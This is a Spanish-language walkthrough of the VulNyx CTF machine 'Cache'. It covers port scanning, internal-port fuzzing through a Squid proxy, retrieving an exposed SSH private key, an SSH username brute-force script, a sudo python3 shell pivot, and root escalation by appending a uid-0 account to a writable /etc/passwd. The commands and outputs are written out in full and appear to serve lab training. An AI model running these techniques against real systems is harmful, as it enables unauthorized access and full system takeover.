Open in app

Sign in

Write

Sign in

VulNyx | Cache (Walkthrough)

d4t4s3c
5 min readJan 14, 2024

Cache es una máquina Linux de dificultad media de la plataforma VulNyx, creada por d4t4s3c y funciona correctamente en VirtualBox.

Skills:

  • Squid Proxy Cache
  • Internal Port Discovery
  • Frute Force (Users)
  • Privilege Escalation (Writable /etc/passwd)

Nmap

❯ nmap -n -Pn -sS -p- --min-rate="5000" 192.168.1.62

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-14 13:09 CET
Nmap scan report for 192.168.1.62
Host is up (0.00013s latency).
Not shown: 65532 closed tcp ports (reset)

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3128/tcp open  squid-http
❯ nmap -n -Pn -sVC -p22,80,3128 192.168.1.62

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-14 13:10 CET
Nmap scan report for 192.168.1.62
Host is up (0.00042s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey: 
|   256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_  256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
80/tcp   open  http       Apache httpd 2.4.57 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.57 (Debian)
3128/tcp open  http-proxy Squid http proxy 5.7
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: squid/5.7
|_http-title: ERROR: The requested URL could not be retrieved

22 ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
80 http Apache httpd 2.4.57 ((Debian))
3128 http-proxy Squid http proxy 5.7

Port: 80 (HTTP)

realizo fuzzing en busca de posibles rutas/archivos sin éxito…

❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u 'http://192.168.1.62' -x 'txt,php,html'

/index.html           (Status: 200) [Size: 10701]

Port: 3128 (Squid)

Internal Port Discovery

con Wfuzz intento descubrir puertos internos pasando por Squid

❯ wfuzz -c -p 192.168.1.62:3128 -z range,1-65535 -u "http://127.0.0.1:FUZZ" --sc=200
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://127.0.0.1:FUZZ/
Total requests: 65535

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000080:   200        368 L    933 W      10701 Ch    "80"
000021500:   200        22 L     40 W       325 Ch      "21500"

21500

agrego en la opciones de FoxyProxy la dirección ip y puerto de la victima para visualizar el sitio pasando por el Squid y lo activo

encuentro un servidor web interno corriendo por el puerto 21500

realizo fuzzing al servidor interno pasando por el Squid

❯ wfuzz -c -p 192.168.1.62:3128 -w /opt/directory-list-2.3-medium.txt -u "http://127.0.0.1:21500/FUZZ" --hc=404
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://127.0.0.1:21500/FUZZ
Total requests: 220546

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000005669:   301        7 L      11 W       169 Ch      "cloud"

/cloud

en /cloud encuentro un 403 Forbidden porque no tengo capacidad de directory listing para ver el contenido del recurso

realizo fuzzing de nuevo al servidor interno pasando por el Squid

❯ wfuzz -c -p 192.168.1.62:3128 -w /opt/directory-list-2.3-medium.txt -u "http://127.0.0.1:21500/cloud/FUZZ" --hc=404
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://127.0.0.1:21500/cloud/FUZZ
Total requests: 220546

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000001788:   200        27 L     33 W       1675 Ch     "key"

key

en /cloud/key encuentro una id_rsa

❯ curl --proxy "http://192.168.1.62:3128" -sX GET "http://127.0.0.1:21500/cloud/key"

-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAztdB5eKtYEOj0T9uEgy0x43HLS/nUhmV3yzwFL37ePOznxik
qRUY2JernRYQF0RA0MOSu+nu6C4I5CPPTVoIkigYt8mMymVbtdM79va+rxtayi1W
EiZKGz77a5ukikqdauusb3A6KIDd+YJZaeasNTbgwpLR32+V2DfpPmoJa4oK8i1s
UZ3vuWx7+Vws3O5LgVPWIZL/BeWG6X0uXs9J5XypDMupY2fIDulIRay1sJknQmuw
6KxF4uaJY4ilBgOV7snFLUQC3JMghcW54NFC+ezfWtWI7s2fNYpwKzEGMhhUUUvZ
aE0Sm5pp+756Jzm8uX9ilNf89R8yMZujmGLjIQIDAQABAoIBAGOTIThIXerf5TdQ
7+5ki4sd5+sLCrNteccM3S8/Hpbly20l8e8sJt/udEGVY32v7/wQis1IGylPMByU
WLIGS+YAw5WGw+6TyQjJfi6wLrAh3R1DohHuuPJQ6byuGxIwRYQ5nLOxNW5WS4ZY
iC8BS5n6p01EXSDRmTOUBwdzCMHpvyqtc9LeMCKd+dLAMl/5IA9VND1AG+wvapvy
P6UaVgtVssPx/WgYxzF1MwfGLFlTXgD+RFYNWDQslIpZ/v4ntj/OXR/bUVAcd1Cu
adfEYXp3tJmc08qVeaiuX2OArZcOrytgX6uy0e1IrIPndEtUG1OZMiSVvpZhDA3m
jy95HoECgYEA6zqQZRX6SN+oQ0p7WsSdS8WH2DLTFaWL3ia/2FVJrjWIKqiwwWz+
Ey+pZqExLMNhVasG4OsvKNvNWAjH86Bz4LPv0S9GcJO16H1xQGBTLlJYJPbt6T/k
fX5pbo33bekB0PmI/ZV7B7HH14OLK6Lau/Sb74M/IDujQYooDdeLwSkCgYEA4Rr5
Q+yCqvt4uWY9lpWzGSSrZJatJG2tz/DWRBPsoboVYzII8l03lVa36uJ7FFjk/tEE
mdFd54sf8BwK5MYlXHcqqibqGrQeP/3EgoohV7PjeZSPxOIRZFS0X8VwHN9C9dUU
QDoTm433TFe+huM0nA8pJti8AMQynhPJOojE+TkCgYBMyOwzoy31NdUGSjzkD0RN
ZKiIYWbYLRbwKHP9WTHZBS5yxmgUa9CwUKGal8mmlAyk21Q+fWcCjmWEdDFZDKpm
0jXZcfYrb3w07SXX3tmoSEbvog9dUXbzpB0kcoEvRp1KKvqV1IK5q0XRyuXWE64V
Jq70S0KC8hTDoyaaBh9fqQKBgQCjrl9t+n4RIgXomeVSp8uxDq7p135SrMXkG/VR
T0OTXaHLnUhQI2QVXRci3kgsxW7NsuKrjke/47P3fgyVyVbFY4lMbDtx62LLmRTY
7uPLx+wyLcpUmSWYVNdLhF8/P0CLTMMK6K/1PkeB5ZOOtYs9pvB/ZL1fuUotE6oQ
u/6uUQKBgByAFFizSLC0SN/FbvrSf0f6mp9C2z3Q1Q6hoTGn1pMBzcDEdR8r8UHr
V0DOq5hJtET0cVvW4whnLtxhW+ikAQI5Rgc8fB7adGX2b0JiEo1LVhshs50d1of7
2VHdmG7wir+8EyKvGEPZQJaLlNjBbRXi/hTUWJJmybFJjeAiicuH
-----END RSA PRIVATE KEY-----

❯ curl --proxy "http://192.168.1.62:3128" -sX GET "http://127.0.0.1:21500/cloud/key" >id_rsa

Port: 22 (SSH)

dispongo de una id_rsa pero no conozco el nombre usuario

❯ chmod 600 id_rsa
❯ ssh -i id_rsa blabla@192.168.1.62
blabla@192.168.1.62: Permission denied (publickey).

Brute Force (Users)

creo un script en bash para poder realizar con la id_rsa fuerza bruta de usuarios y descubrir así el usuario valido

#!/bin/bash

RED="\e[91m"
GREEN="\e[92m"
WHITE="\e[97m"
USERS=$(<names.txt)
RHOST="192.168.1.62"

for USER in $USERS; do
  ssh -i id_rsa $USER@$RHOST -x id &>/dev/null
  if [ $? -eq 0 ]; then
    echo -e "$GREEN[+] User $USER is valid"
    exit
  else
    echo -e "$RED[-]$WHITE User $USER is invalid"
  fi
done

consigo descubrir el usuario valido

abraham

accedo al sistema como usuario abraham

❯ ssh -i id_rsa abraham@192.168.1.62
abraham@cache:~$ id;hostname
uid=1000(abraham) gid=1000(abraham) grupos=1000(abraham)
cache

User Pivoting (abraham > jeff)

abraham puede ejecutar como jeff el binario python3 con sudo

abraham@cache:~$ sudo -l
Matching Defaults entries for abraham on cache:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User abraham may run the following commands on cache:
    (jeff) NOPASSWD: /usr/bin/python3

me convierto en usuario jeff abusando del privilegio

abraham@cache:~$ sudo -u jeff /usr/bin/python3

Python 3.11.2 (main, Mar 13 2023, 12:18:29) [GCC 12.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>>
>>> import os
>>> os.system("/usr/bin/bash")

jeff@cache:~$ id
uid=1001(jeff) gid=1001(jeff) grupos=1001(jeff)

Privilege Escalation

tras realizar una búsqueda por permisos encontré que el usuario jeff tiene permisos de escritura tipo ACL sobre el archivo /etc/passwd

jeff@cache:~$ find / -exec sh -c 'getfacl {} 2>/dev/null | grep -q "user:jeff" && echo {}' \; 2>/dev/null
/etc/passwd
jeff@cache:~$ ls -l /etc/passwd
-rw-rw-r--+ 1 root root 1106 ene 12 16:43 /etc/passwd
jeff@cache:~$
jeff@cache:~$ getfacl /etc/passwd
getfacl: Eliminando '/' inicial en nombres de ruta absolutos
# file: etc/passwd
# owner: root
# group: root
user::rw-
user:jeff:rw-
group::r--
mask::rw-
other::r--

genero con OpenSSL un hash partiendo de un password, creo el usuario privesc y lo agrego al archivo /etc/passwd

jeff@cache:~$ cat /etc/passwd |grep root
root:x:0:0:root:/root:/bin/bash
jeff@cache:~$ openssl passwd 'password'
$1$P7jMlw3T$3QANtA.uzoY8DU6VT2PvI1
jeff@cache:~$ echo -ne 'privesc:$1$P7jMlw3T$3QANtA.uzoY8DU6VT2PvI1:0:0:root:/root:/bin/bash' >>/etc/passwd

me convierto en usuario root

jeff@cache:~$ su - privesc
Contraseña: 
root@cache:~# id
uid=0(root) gid=0(root) grupos=0(root)

ya como usuario root puedo leer las flags user.txt y root.txt

root@cache:~# find / -name user.txt -o -name root.txt |xargs cat
4034da58b***********************
a9d46582a***********************

hasta aquí la máquina Cache.

Happy Hacking!

Vulnyx
Offensive Security
Pentesting
Red Team
Oscp Preparation

--

--

d4t4s3c

Written by d4t4s3c

21 Followers

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams